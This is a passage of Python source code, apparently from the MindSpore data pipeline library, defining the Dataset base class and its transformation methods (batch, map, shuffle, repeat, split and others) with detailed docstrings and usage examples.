if dataset is not None:
dataset.reset(step)
else:
raise RuntimeError("Training dataset is not set.")
class Shuffle(str, Enum):
"""Specify the shuffle mode.
- GLOBAL: Shuffle both the files and samples.
- FILES: Shuffle files only.
- INFILE: Shuffle data within each file.
"""
GLOBAL: str = "global"
FILES: str = "files"
INFILE: str = "infile"
ShuffleToShuffleMode = {Shuffle.FILES: cde.ShuffleMode.FILES,
Shuffle.GLOBAL: cde.ShuffleMode.GLOBAL,
Shuffle.INFILE: cde.ShuffleMode.INFILE}
def shuffle_to_shuffle_mode(shuffle):
"""
Shuffle Enum to Shuffle Mode
Args:
shuffle (Shuffle): shuffle flag to shuffle mode in C layer
Returns:
ShuffleMode, shuffle mode
"""
shuffle_mode = cde.ShuffleMode.GLOBAL # Global shuffle
if not isinstance(shuffle, Shuffle):
if shuffle is None or shuffle:
shuffle_mode = cde.ShuffleMode.GLOBAL # Global shuffle
else:
shuffle_mode = cde.ShuffleMode.FALSE # No shuffle
else:
shuffle_mode = ShuffleToShuffleMode[shuffle]
return shuffle_mode
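# Illustrative mapping of shuffle_to_shuffle_mode (follows the branches above):
#   Shuffle.FILES -> cde.ShuffleMode.FILES, Shuffle.INFILE -> cde.ShuffleMode.INFILE,
#   True or None  -> cde.ShuffleMode.GLOBAL, False -> cde.ShuffleMode.FALSE.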
def shuffle_to_bool(shuffle):
"""
Shuffle Enum to bool
Args:
shuffle (Shuffle): shuffle flag to bool
Returns:
bool, True / False
"""
shuffle_bool = True
if not isinstance(shuffle, Shuffle):
if shuffle is None:
shuffle_bool = None
elif shuffle:
shuffle_bool = True
else:
shuffle_bool = False
else:
shuffle_bool = True
return shuffle_bool
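# Illustrative mapping of shuffle_to_bool (follows the branches above):
#   any Shuffle value -> True, None -> None, other truthy values -> True, falsy values -> False.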
@check_zip
def zip(datasets):
"""
Zip the datasets in the input tuple of datasets.
Args:
datasets (tuple of class Dataset): A tuple of datasets to be zipped together.
The number of datasets must be more than 1.
Returns:
Dataset, dataset zipped.
Raises:
ValueError: If the number of datasets is 1.
TypeError: If datasets is not a tuple.
Examples:
>>> # Create a dataset which is the combination of dataset_1 and dataset_2
>>> dataset = ds.zip((dataset_1, dataset_2))
"""
if len(datasets) <= 1:
raise ValueError(
"Can't zip empty or just one dataset!")
for dataset in datasets:
if not isinstance(dataset, Dataset):
raise TypeError("Invalid dataset, expected Dataset object, but got %s!" % type(dataset))
return ZipDataset(datasets)
def _get_operator_process():
"""
Inner implemented method, mainly for passing sub-process id in C layer
Returns:
dict, mapping dict of operator id and corresponding process id.
"""
global _OP_PROCESS
process_info = _OP_PROCESS
op_process = dict()
keys = process_info.keys()
fetched_all = True
for key in keys:
op_process[key] = list(process_info[key][1])
item_full = (len(process_info[key][1]) == process_info[key][0])
fetched_all = fetched_all and item_full
return op_process, fetched_all
def _set_dataset_permissions(file_name, num_files):
"""
set saved dataset files' permissions to 600
the rule of dataset filenames should be the same as those in C++.
"""
num_digits = len(str(num_files - 1))
if num_files == 1:
paths = [file_name]
else:
paths = ["{}{}".format(file_name, str(x).rjust(num_digits, '0')) for x in range(num_files)]
for item in paths:
if os.path.exists(item):
os.chmod(item, stat.S_IRUSR | stat.S_IWUSR)
index_file = item + ".db"
if os.path.exists(index_file):
os.chmod(index_file, stat.S_IRUSR | stat.S_IWUSR)
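# Example of the filename rule above (illustrative values): with file_name="train.mindrecord"
# and num_files=3, the files "train.mindrecord0", "train.mindrecord1", "train.mindrecord2" and
# their ".db" index files are chmod'ed to 600 when they exist.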
class Dataset:
"""
Abstract class to represent a dataset in DataEngine's data pipeline.
This class is the base class of SourceDataset and Dataset, and represents
a node in the data flow graph.
Dataset
-----------------------------------------------------------
| | | |
VisionBaseDataset TextBaseDataset AudioBaseDataset |
- - - |
| | | |
---------------------------------------- |
UnionBaseDataset |
|
SourceDataset
-
|
MappableDataset
DatasetOperator: MapDataset(UnionBaseDataset)
BatchDataset(UnionBaseDataset)
BucketBatchByLengthDataset(UnionBaseDataset)
ShuffleDataset(UnionBaseDataset)
FilterDataset(UnionBaseDataset)
RepeatDataset(UnionBaseDataset)
SkipDataset(UnionBaseDataset)
TakeDataset(UnionBaseDataset)
ZipDataset(UnionBaseDataset)
ConcatDataset(UnionBaseDataset)
RenameDataset(UnionBaseDataset)
ProjectDataset(UnionBaseDataset)
SyncWaitDataset(UnionBaseDataset)
Impl Dataset - vision: ImageFolderDataset(MappableDataset, VisionBaseDataset)
USPSDataset(SourceDataset, VisionBaseDataset)
Impl Dataset - text: TextFileDataset(SourceDataset, TextBaseDataset)
YahooAnswersDataset(SourceDataset, TextBaseDataset)
Impl Dataset - audio: LJSpeechDataset(MappableDataset, AudioBaseDataset)
TedliumDataset(MappableDataset, AudioBaseDataset)
Impl Dataset - standard: MindDataset(MappableDataset, UnionBaseDataset)
TFRecordDataset(SourceDataset, UnionBaseDataset)
Impl Dataset - user defined: GeneratorDataset(MappableDataset, UnionBaseDataset)
NumpySlicesDataset(GeneratorDataset)
Args:
num_parallel_workers (int, optional): Number of workers to process the dataset in parallel
(default=None).
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
# Note: children and parent are internal variables, not recommended for external using.
self.children = replace_none(children, [])
if isinstance(self.children, tuple):
self.children = list(self.children)
if not isinstance(self.children, list):
self.children = [self.children]
self.parent = []
for child in self.children:
child.parent.append(weakref.ref(self))
self.num_parallel_workers = num_parallel_workers
self.cache = cache
self._device_iter = 0
self._input_indexs = ()
self.saved_output_types = None
self.saved_output_shapes = None
self.dynamic_setting = [False, None]
self.saved_min_shapes = None
self.saved_max_shapes = None
self._col_names = None
self.dataset_size = None
self._batch_size = None
self._num_classes = None
self._repeat_count = None
self._class_indexing = None
self._sync = False
def create_ir_tree(self):
"""
Internal method to build an IR tree.
Returns:
DatasetNode, the root node of the IR tree.
Dataset, the root dataset of the IR tree.
"""
parent = self.parent
self.parent = []
dataset = copy.deepcopy(self)
global _OP_NAME
_OP_NAME = Dataset._get_operator_id(dataset)
ir_tree = dataset.parse_tree()
self.parent = parent
_init_device_info()
return ir_tree, dataset
def close_pool(self):
"""
        Close the multiprocessing pool in the dataset. If you are familiar with the multiprocessing library, you can
        regard this as a destructor for a processing pool object.
"""
# del all the SharedQueue when close the pool
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.delete_shared_memory()
self.process_pool.close_pool()
for child in self.children:
child.close_pool()
def notify_watchdog(self):
"""
        Close the watchdog thread in the dataset. GeneratorDataset/map/batch use a thread named watch_dog to monitor
        their worker processes. For get_dataset_size/output_shapes/output_types/get_col_name/num_classes, we need
        notify_watchdog to close the watch_dog thread manually.
"""
if hasattr(self, 'sample_fn') and self.sample_fn is not None:
if self.sample_fn.multi_process:
self.sample_fn._abort_watchdog() # pylint: disable=W0212
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.abort_watchdog()
for child in self.children:
child.notify_watchdog()
@staticmethod
def _get_operator_id(dataset):
"""
Internal method to iterate the tree and obtain op_id of each operator.
Returns:
Dataset, the root dataset of the tree.
"""
op_name = dict()
generator_process = dict()
op_name[str(dataset)] = 0
op_id = 1
def process_name(datasets, operator_id):
if not datasets:
return 0
temp = []
for item in datasets:
for d in item.children:
temp.append(d)
op_name[str(d)] = operator_id
from mindspore.dataset.engine.datasets_user_defined import GeneratorDataset
if isinstance(d, GeneratorDataset) and d.sample_fn and d.sample_fn.pids:
generator_process[operator_id] = [d.num_parallel_workers, set(d.sample_fn.pids)]
operator_id = operator_id + 1
return process_name(temp, operator_id)
process_name([dataset], op_id)
if generator_process:
global _OP_PROCESS
_OP_PROCESS.update(generator_process)
return op_name
def parse_tree(self):
"""
Internal method to parse the API tree into an IR tree.
Returns:
DatasetNode, the root node of the IR tree.
"""
if len(self.parent) > 1:
raise ValueError("The data pipeline is not a tree (i.e., one node has 2 consumers)")
ir_children = [d.parse_tree() for d in self.children]
# Bootstrap can only be performed on a copy of the original dataset node.
# Bootstrap on original dataset node will make all iterators share the same process pool
self.iterator_bootstrap()
ir_node = self.parse(ir_children)
ir_node = self.post_parse(ir_node)
return ir_node
def __safe_deepcopy__(self, memodict, exclude=()):
if id(self) in memodict:
return memodict[id(self)]
cls = self.__class__
new_op = cls.__new__(cls)
memodict[id(self)] = new_op
for arg, value in self.__dict__.items():
if arg in exclude:
setattr(new_op, arg, value)
else:
try:
setattr(new_op, arg, copy.deepcopy(value, memodict))
except TypeError:
setattr(new_op, arg, value)
return new_op
def iterator_bootstrap(self):
pass
@staticmethod
def _noop_mode():
if _is_role_sched() or _is_role_pserver():
return True
return False
def __add__(self, datasets):
return self.concat(datasets)
def to_json(self, filename=""):
"""
Serialize a pipeline into JSON string and dump into file if filename is provided.
Args:
filename (str): filename of JSON file to be saved as (default="").
Returns:
str, JSON string of the pipeline.
"""
ir_tree, _ = self.create_ir_tree()
return json.loads(ir_tree.to_json(filename))
@check_bucket_batch_by_length
def bucket_batch_by_length(self, column_names, bucket_boundaries, bucket_batch_sizes, element_length_function=None,
pad_info=None, pad_to_bucket_boundary=False, drop_remainder=False):
"""
Bucket elements according to their lengths. Each bucket will be padded and batched when
        it is full.
A length function is called on each row in the dataset. The row is then
bucketed based on its length and bucket boundaries. When a bucket reaches its
corresponding size specified in bucket_batch_sizes, the entire bucket will be
padded according to pad_info, and then form a batch.
Each batch will be full, except one special case: the last batch for each bucket may not be full.
Args:
column_names (list[str]): Columns passed to element_length_function.
bucket_boundaries (list[int]): A list consisting of the upper boundaries
of the buckets. Must be strictly increasing. If there are n boundaries,
n+1 buckets are created: One bucket for [0, bucket_boundaries[0]), one
bucket for [bucket_boundaries[i], bucket_boundaries[i+1]) for each
0<i<n-1, and the last bucket for [bucket_boundaries[n-1], inf).
bucket_batch_sizes (list[int]): A list consisting of the batch sizes for
each bucket. Must contain len(bucket_boundaries)+1 elements.
element_length_function (Callable, optional): A function that takes in
                M arguments where M = len(column_names) and returns an integer. If no value is
                provided, then M (i.e. len(column_names)) must be 1, and the size of the first
dimension of that column will be taken as the length (default=None).
pad_info (dict, optional): The information about how to batch each column. The key
corresponds to the column name, and the value must be a tuple of 2 elements.
The first element corresponds to the shape to pad to, and the second
element corresponds to the value to pad with. If a column is not
specified, then that column will be padded to the longest in the current
batch, and 0 will be used as the padding value. Any None dimensions will
                be padded to the longest in the current batch, unless
pad_to_bucket_boundary is True. If no padding is wanted, set pad_info
to None (default=None).
pad_to_bucket_boundary (bool, optional): If True, will pad each None
dimension in pad_info to the bucket_boundary minus 1. If there are any
elements that fall into the last bucket, an error will occur
(default=False).
drop_remainder (bool, optional): If True, will drop the last batch for each
bucket if it is not a full batch (default=False).
Returns:
Dataset, dataset bucketed and batched by length.
Examples:
>>> # Create a dataset where certain counts rows are combined into a batch
>>> # and drops the last incomplete batch if there is one.
>>> import numpy as np
>>> def generate_2_columns(n):
... for i in range(n):
... yield (np.array([i]), np.array([j for j in range(i + 1)]))
>>>
>>> column_names = ["col1", "col2"]
>>> dataset = ds.GeneratorDataset(generate_2_columns(8), column_names)
>>> bucket_boundaries = [5, 10]
>>> bucket_batch_sizes = [2, 1, 1]
>>> element_length_function = (lambda col1, col2: max(len(col1), len(col2)))
>>> # Will pad col2 to shape [bucket_boundaries[i]] where i is the
>>> # index of the bucket that is currently being batched.
>>> pad_info = {"col2": ([None], -1)}
>>> pad_to_bucket_boundary = True
>>> dataset = dataset.bucket_batch_by_length(column_names, bucket_boundaries,
... bucket_batch_sizes,
... element_length_function, pad_info,
... pad_to_bucket_boundary)
"""
return BucketBatchByLengthDataset(self, column_names, bucket_boundaries, bucket_batch_sizes,
element_length_function, pad_info, pad_to_bucket_boundary, drop_remainder)
@check_batch
def batch(self, batch_size, drop_remainder=False, num_parallel_workers=None, per_batch_map=None,
input_columns=None, output_columns=None, column_order=None, pad_info=None,
python_multiprocessing=False, max_rowsize=16):
"""
Combine batch_size number of consecutive rows into batches.
For any child node, a batch is treated as a single row.
For any column, all the elements within that column must have the same shape.
If a per_batch_map callable is provided, it will be applied to the batches of tensors.
Note:
            The order of using repeat and batch reflects the number of batches and per_batch_map.
            It is recommended that the repeat operation be applied after the batch operation has finished.
Args:
batch_size (int or function): The number of rows each batch is created with. An
int or callable object which takes exactly 1 parameter, BatchInfo.
drop_remainder (bool, optional): Determines whether or not to drop the last block
whose data row number is less than batch size (default=False). If True, and if there are less
than batch_size rows available to make the last batch, then those rows will
be dropped and not propagated to the child node.
num_parallel_workers (int, optional): Number of workers(threads) to process the dataset in parallel
(default=None).
per_batch_map (callable, optional): Per batch map callable (default=None). A callable which takes
(list[Tensor], list[Tensor], ..., BatchInfo) as input parameters. Each list[Tensor] represents a batch
of Tensors on a given column. The number of lists should match with the number of entries in
input_columns. The last parameter of the callable should always be a BatchInfo object. Per_batch_map
should return (list[Tensor], list[Tensor], ...). The length of each list in output should be the same as
the input. output_columns is required if the number of output lists is different from input.
input_columns (Union[str, list[str]], optional): List of names of the input columns. The size of the list
should match with signature of per_batch_map callable (default=None).
output_columns (Union[str, list[str]], optional): List of names assigned to the columns
outputted by the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (Union[str, list[str]], optional): Specifies the list of all the columns you need in the whole
dataset (default=None). The parameter is required when len(input_column) != len(output_column).
Caution: the list here is not just the columns specified in parameter input_columns and output_columns.
pad_info (dict, optional): Whether to perform padding on selected columns. pad_info={"col1":([224,224],0)}
would pad column with name "col1" to a tensor of size [224,224] and fill the missing with 0
(default=None).
python_multiprocessing (bool, optional): Parallelize Python function per_batch_map with multi-processing.
                This option could be beneficial if the function is computationally heavy (default=False).
max_rowsize(int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
Returns:
BatchDataset, dataset batched.
Examples:
>>> # Create a dataset where every 100 rows are combined into a batch
>>> # and drops the last incomplete batch if there is one.
>>> dataset = dataset.batch(100, True)
>>> # resize image according to its batch number, if it's 5-th batch, resize to (5^2, 5^2) = (25, 25)
>>> def np_resize(col, BatchInfo):
... output = col.copy()
... s = (BatchInfo.get_batch_num() + 1) ** 2
... index = 0
... for c in col:
... img = Image.fromarray(c.astype('uint8')).convert('RGB')
... img = img.resize((s, s), Image.ANTIALIAS)
... output[index] = np.array(img)
... index += 1
... return (output,)
>>> dataset = dataset.batch(batch_size=8, input_columns=["image"], per_batch_map=np_resize)
"""
return BatchDataset(self, batch_size, drop_remainder, num_parallel_workers, per_batch_map, input_columns,
output_columns, column_order, pad_info, python_multiprocessing, max_rowsize)
@check_sync_wait
def sync_wait(self, condition_name, num_batch=1, callback=None):
"""
Add a blocking condition to the input Dataset. A synchronize action will be applied.
Args:
condition_name (str): The condition name that is used to toggle sending next row.
num_batch (int): the number of batches without blocking at the start of each epoch (default=1).
callback (function): The callback function that will be invoked when sync_update is called (default=None).
Returns:
SyncWaitDataset, dataset added a blocking condition.
Raises:
RuntimeError: If condition name already exists.
Examples:
>>> import numpy as np
>>> def gen():
... for i in range(100):
... yield (np.array(i),)
>>>
>>> class Augment:
... def __init__(self, loss):
... self.loss = loss
...
... def preprocess(self, input_):
... return input_
...
... def update(self, data):
... self.loss = data["loss"]
>>>
>>> batch_size = 4
>>> dataset = ds.GeneratorDataset(gen, column_names=["input"])
>>>
>>> aug = Augment(0)
>>> dataset = dataset.sync_wait(condition_name="policy", callback=aug.update)
>>> dataset = dataset.map(operations=[aug.preprocess], input_columns=["input"])
>>> dataset = dataset.batch(batch_size)
>>> count = 0
>>> for data in dataset.create_dict_iterator(num_epochs=1, output_numpy=True):
... assert data["input"][0] == count
... count += batch_size
... data = {"loss": count}
... dataset.sync_update(condition_name="policy", data=data)
"""
return SyncWaitDataset(self, condition_name, num_batch, callback)
@check_shuffle
def shuffle(self, buffer_size):
"""
Randomly shuffles the rows of this dataset using the following policy:
1. Make a shuffle buffer that contains the first buffer_size rows.
2. Randomly select an element from the shuffle buffer to be the next row
propagated to the child node.
3. Get the next row (if any) from the parent node and put it in the shuffle buffer.
4. Repeat steps 2 and 3 until there are no more rows left in the shuffle buffer.
A random seed can be provided to be used on the first epoch. In every subsequent
        epoch, the seed is changed to a new, randomly generated value.
Args:
buffer_size (int): The size of the buffer (must be larger than 1) for
shuffling. Setting buffer_size equal to the number of rows in the entire
dataset will result in a global shuffle.
Returns:
Dataset, dataset shuffled.
Raises:
RuntimeError: If a sync operator exists before the shuffle operation.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Optionally set the seed for the first epoch
>>> ds.config.set_seed(58)
>>> # Create a shuffled dataset using a shuffle buffer of size 4
>>> dataset = dataset.shuffle(4)
"""
return ShuffleDataset(self, buffer_size)
def flat_map(self, func):
"""
Map `func` to each row in dataset and flatten the result.
The specified `func` is a function that must take one numpy.ndarray as input
and return a 'Dataset'.
Args:
func (function): A function that must take one numpy.ndarray as an argument and
return a 'Dataset'.
Returns:
Dataset, dataset applied by the function.
Examples:
>>> # use NumpySlicesDataset as an example
>>> dataset = ds.NumpySlicesDataset([[0, 1], [2, 3]])
>>>
>>> def flat_map_func(array):
... # create a NumpySlicesDataset with the array
... dataset = ds.NumpySlicesDataset(array)
... # repeat the dataset twice
... dataset = dataset.repeat(2)
... return dataset
>>>
>>> dataset = dataset.flat_map(flat_map_func)
>>> # [[0, 1], [0, 1], [2, 3], [2, 3]]
Raises:
TypeError: If `func` is not a function.
TypeError: If `func` doesn't return a Dataset.
"""
dataset = None
if not hasattr(func, '__call__'):
logger.critical("func must be a function.")
raise TypeError("func must be a function.")
for row_data in self.create_tuple_iterator(output_numpy=True):
if dataset is None:
dataset = func(row_data)
else:
dataset += func(row_data)
if not isinstance(dataset, Dataset):
logger.critical("flat_map must return a Dataset object.")
raise TypeError("flat_map must return a Dataset object.")
return dataset
@check_map
def map(self, operations, input_columns=None, output_columns=None, column_order=None,
num_parallel_workers=None, python_multiprocessing=False, cache=None, callbacks=None,
max_rowsize=16, offload=None):
"""
Apply each operation in operations to this dataset.
The order of operations is determined by the position of each operation in the operations parameter.
operations[0] will be applied first, then operations[1], then operations[2], etc.
Each operation will be passed one or more columns from the dataset as input, and zero or
more columns will be outputted. The first operation will be passed the columns specified
in input_columns as input. If there is more than one operator in operations, the outputted
columns of the previous operation are used as the input columns for the next operation.
The columns outputted by the very last operation will be assigned names specified by
output_columns.
Only the columns specified in column_order will be propagated to the child node. These
columns will be in the same order as specified in column_order.
Args:
operations (Union[list[TensorOperation], list[functions]]): List of operations to be
applied on the dataset. Operations are applied in the order they appear in this list.
input_columns (Union[str, list[str]], optional): List of the names of the columns that will be passed to
the first operation as input. The size of this list must match the number of
input columns expected by the first operator. (default=None, the first
operation will be passed however many columns are required, starting from
the first column).
output_columns (Union[str, list[str]], optional): List of names assigned to the columns outputted by
the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (list[str], optional): Specifies the list of all the columns you need in the whole
dataset (default=None). The parameter is required when len(input_column) != len(output_column).
Caution: the list here is not just the columns specified in parameter input_columns and output_columns.
num_parallel_workers (int, optional): Number of threads used to process the dataset in
parallel (default=None, the value from the configuration will be used).
python_multiprocessing (bool, optional): Parallelize Python operations with multiple worker processes. This
option could be beneficial if the Python operation is computational heavy (default=False).
cache (DatasetCache, optional): Use tensor caching service to speed up dataset processing.
(default=None, which means no cache is used).
callbacks (DSCallback, list[DSCallback], optional): List of Dataset callbacks to be called (Default=None).
max_rowsize (int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (Default=16).
offload (bool, optional): Flag to indicate whether offload is used (Default=None).
Note:
- Input `operations` mainly accepts c_transforms and py_transforms operators from mindspore.dataset, plus
user-defined Python functions (PyFuncs).
- Do not add network computing operators from mindspore.nn and mindspore.ops or others into this
`operations`.
Returns:
Dataset, dataset after mapping operation.
Examples:
>>> # dataset is an instance of Dataset which has 2 columns, "image" and "label".
>>>
>>> # Define two operations, where each operation accepts 1 input column and outputs 1 column.
>>> decode_op = c_vision.Decode(rgb=True)
>>> random_jitter_op = c_vision.RandomColorAdjust(brightness=(0.8, 0.8), contrast=(1, 1),
... saturation=(1, 1), hue=(0, 0))
>>>
>>> # 1) Simple map example.
>>>
>>> # Apply decode_op on column "image". This column will be replaced by the outputted
>>> # column of decode_op. Since column_order is not provided, both columns "image"
>>> # and "label" will be propagated to the child node in their original order.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"])
>>>
>>> # Decode and rename column "image" to "decoded_image".
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"], output_columns=["decoded_image"])
>>>
>>> # Specify the order of the output columns.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=None, column_order=["label", "image"])
>>>
>>> # Rename column "image" to "decoded_image" and also specify the order of the output columns.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=["decoded_image"], column_order=["label", "decoded_image"])
>>>
>>> # Rename column "image" to "decoded_image" and keep only this column.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=["decoded_image"], column_order=["decoded_image"])
>>>
>>> # A simple example for mapping pyfunc. Renaming columns and specifying column order
>>> # work in the same way as the previous examples.
>>> dataset = ds.NumpySlicesDataset(data=[[0, 1, 2]], column_names=["data"])
>>> dataset = dataset.map(operations=[(lambda x: x + 1)], input_columns=["data"])
>>>
>>> # 2) Map example with more than one operation.
>>>
>>> # Create a dataset where the images are decoded, then randomly color jittered.
>>> # decode_op takes column "image" as input and outputs one column. The column
>>> # outputted by decode_op is passed as input to random_jitter_op.
>>> # random_jitter_op will output one column. Column "image" will be replaced by
>>> # the column outputted by random_jitter_op (the very last operation). All other
>>> # columns are unchanged. Since column_order is not specified, the order of the
>>> # columns will remain the same.
>>> dataset = dataset.map(operations=[decode_op, random_jitter_op], input_columns=["image"])
>>>
>>> # Rename the column outputted by random_jitter_op to "image_mapped".
>>> # Specifying column order works in the same way as examples in 1).
>>> dataset = dataset.map(operations=[decode_op, random_jitter_op], input_columns=["image"],
... output_columns=["image_mapped"])
>>>
>>> # Map with multiple operations using pyfunc. Renaming columns and specifying column order
>>> # work in the same way as examples in 1).
>>> dataset = ds.NumpySlicesDataset(data=[[0, 1, 2]], column_names=["data"])
>>> dataset = dataset.map(operations=[(lambda x: x * x), (lambda x: x - 1)], input_columns=["data"],
... output_columns=["data_mapped"])
>>>
>>> # 3) Example where number of input columns is not equal to number of output columns.
>>>
>>> # operations[0] is a lambda that takes 2 columns as input and outputs 3 columns.
>>> # operations[1] is a lambda that takes 3 columns as input and outputs 1 column.
>>> # operations[2] is a lambda that takes 1 column as input and outputs 4 columns.
>>> #
>>> # Note: The number of output columns of operation[i] must equal the number of
>>> # input columns of operation[i+1]. Otherwise, this map call will also result
>>> # in an error.
>>> operations = [(lambda x, y: (x, x + y, x + y + 1)),
... (lambda x, y, z: x * y * z),
... (lambda x: (x % 2, x % 3, x % 5, x % 7))]
>>>
>>> # Note: Since the number of input columns is not the same as the number of
>>> # output columns, the output_columns and column_order parameters must be
>>> # specified. Otherwise, this map call will also result in an error.
>>>
>>> dataset = ds.NumpySlicesDataset(data=([[0, 1, 2]], [[3, 4, 5]]), column_names=["x", "y"])
>>>
>>> # Propagate all columns to the child node in this order:
>>> dataset = dataset.map(operations, input_columns=["x", "y"],
... output_columns=["mod2", "mod3", "mod5", "mod7"],
... column_order=["mod2", "mod3", "mod5", "mod7"])
>>>
>>> # Propagate some columns to the child node in this order:
>>> dataset = dataset.map(operations, input_columns=["x", "y"],
... output_columns=["mod2", "mod3", "mod5", "mod7"],
... column_order=["mod7", "mod3", "col2"])
"""
if hasattr(self, 'operator_mixed') and getattr(self, 'operator_mixed') is True:
num_parallel_workers = 1
logger.warning(
"Input 'operations' of 'map' includes network computing operators like in mindspore.nn, mindspore.ops, "
"mindspore.numpy module and etc, which do not support multi-thread compiling, recommend to replace it "
"with python implemented operator like numpy etc. Here decrease 'num_parallel_workers' into 1.")
return MapDataset(self, operations, input_columns, output_columns, column_order, num_parallel_workers,
python_multiprocessing, cache, callbacks, max_rowsize, offload)
@check_filter
def filter(self, predicate, input_columns=None, num_parallel_workers=None):
"""
Filter dataset by predicate.
Args:
predicate (callable): Python callable which returns a boolean value. Rows for which it returns False
are filtered out.
input_columns (Union[str, list[str]], optional): List of names of the input columns. If not provided
or provided with None, the predicate will be applied on all columns in the dataset (default=None).
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
Returns:
Dataset, dataset filtered.
Examples:
>>> # generator data(0 ~ 63)
>>> # filter out the rows whose value is greater than or equal to 11
>>> dataset = dataset.filter(predicate=lambda data: data < 11, input_columns=["data"])
"""
return FilterDataset(self, predicate, input_columns, num_parallel_workers)
@check_repeat
def repeat(self, count=None):
"""
Repeat this dataset `count` times. Repeat infinitely if the count is None or -1.
Note:
The order of repeat and batch operations affects the number of batches per epoch. It is recommended that
the repeat operation is used after the batch operation.
Args:
count (int): Number of times the dataset is going to be repeated (default=None).
Returns:
Dataset, dataset repeated.
Examples:
>>> # dataset is an instance object of Dataset
>>>
>>> # Create a dataset where the dataset is repeated for 50 epochs
>>> dataset = dataset.repeat(50)
>>>
>>> # Create a dataset where each epoch is shuffled individually
>>> dataset = dataset.shuffle(10)
>>> dataset = dataset.repeat(50)
>>>
>>> # Create a dataset where the dataset is first repeated for
>>> # 50 epochs before shuffling. The shuffle operator will treat
>>> # the entire 50 epochs as one big dataset.
>>> dataset = dataset.repeat(50)
>>> dataset = dataset.shuffle(10)
"""
return RepeatDataset(self, count)
@check_skip
def skip(self, count):
"""
Skip the first N elements of this dataset.
Args:
count (int): Number of elements in the dataset to be skipped.
Returns:
Dataset, dataset that contains the rows remaining after the first `count` rows are skipped.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Create a dataset which skips first 3 elements from data
>>> dataset = dataset.skip(3)
"""
return SkipDataset(self, count)
@check_take
def take(self, count=-1):
"""
Take at most the given number of elements from the dataset.
Note:
1. If count is greater than the number of elements in the dataset or equal to -1,
all the elements in dataset will be taken.
2. The order of using take and batch matters. If take is before batch operation,
then take the given number of rows; otherwise take the given number of batches.
Args:
count (int, optional): Number of elements to be taken from the dataset (default=-1).
Returns:
Dataset, dataset taken.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Create a dataset where the dataset includes 50 elements.
>>> dataset = dataset.take(50)
"""
return TakeDataset(self, count)
def _get_absolute_split_sizes(self, sizes):
"""
Internal method called by split to calculate absolute split sizes and to
do some error checking after calculating absolute split sizes.
Returns:
int, absolute split sizes of the dataset.
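For example (illustrative only): with a dataset of 10 rows, sizes=[0.9, 0.1] rounds to the
absolute sizes [9, 1]; any rounding shortfall is added to the first split, and any excess is
removed from the first split that is large enough to absorb it.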
"""
# Call get_dataset_size here and check input here because
# don't want to call this once in check_split and another time in
# here again
dataset_size = self.get_dataset_size()
if dataset_size is None or dataset_size <= 0:
raise RuntimeError("dataset_size is unknown, unable to split.")
if not isinstance(sizes, list):
raise RuntimeError("sizes must be a list.")
all_int = all(isinstance(item, int) for item in sizes)
if all_int:
sizes_sum = sum(sizes)
if sizes_sum != dataset_size:
raise RuntimeError("Sum of split sizes {} is not equal to dataset size {}."
.format(sizes_sum, dataset_size))
return sizes
absolute_sizes = []
for item in sizes:
absolute_size = int(round(item * dataset_size))
if absolute_size == 0:
raise RuntimeError("Split percentage {} is too small.".format(item))
absolute_sizes.append(absolute_size)
absolute_sizes_sum = sum(absolute_sizes)
# if we still need more rows, give them to the first split.
# if we have too many rows, remove the extras from the first split that has
# enough rows.
size_difference = int(dataset_size - absolute_sizes_sum)
if size_difference > 0:
absolute_sizes[0] += size_difference
else:
for i, _ in enumerate(absolute_sizes):
if absolute_sizes[i] + size_difference > 0:
absolute_sizes[i] += size_difference
break
if sum(absolute_sizes) != dataset_size:
raise RuntimeError("Sum of calculated split sizes {} is not equal to dataset size {}."
.format(absolute_sizes_sum, dataset_size))
return absolute_sizes
@check_split
def split(self, sizes, randomize=True):
"""
Split the dataset into smaller, non-overlapping datasets.
This is a general purpose split function which can be called from any operator in the pipeline.
There is another, optimized split function, which will be called automatically if ds.split is
called where ds is a MappableDataset.
Args:
sizes (Union[list[int], list[float]]): If a list of integers [s1, s2, …, sn] is
provided, the dataset will be split into n datasets of size s1, size s2, …, size sn
respectively. If the sum of all input sizes does not equal the original dataset size, an
error will occur.
If a list of floats [f1, f2, …, fn] is provided, all floats must be between 0 and 1
and must sum to 1, otherwise an error will occur. The dataset will be split into n
Datasets of size round(f1*K), round(f2*K), …, round(fn*K) where K is the size of the
original dataset.
If after rounding:
- Any size equals 0, an error will occur.
- The sum of split sizes < K, the difference of K - sigma(round(fi * k)) will be added to the first
split.
- The sum of split sizes > K, the difference of sigma(round(fi * K)) - K will be removed from the first
large enough split such that it will have at least 1 row after removing the difference.
randomize (bool, optional): Determines whether or not to split the data randomly (default=True).
If True, the data will be randomly split. Otherwise, each split will be created with
consecutive rows from the dataset.
Note:
1. Dataset cannot be sharded if split is going to be called.
2. It is strongly recommended to not shuffle the dataset, but use randomize=True instead.
Shuffling the dataset may not be deterministic, which means the data in each split
will be different in each epoch.
Raises:
RuntimeError: If get_dataset_size returns None or is not supported for this dataset.
RuntimeError: If `sizes` is list of integers and sum of all elements in sizes does not
equal the dataset size.
RuntimeError: If `sizes` is list of float and there is a split with size 0 after calculations.
RuntimeError: If the dataset is sharded prior to calling split.
ValueError: If `sizes` is list of float and not all floats are between 0 and 1, or if the
floats don't sum to 1.
Returns:
tuple(Dataset), a tuple of datasets that have been split.
Examples:
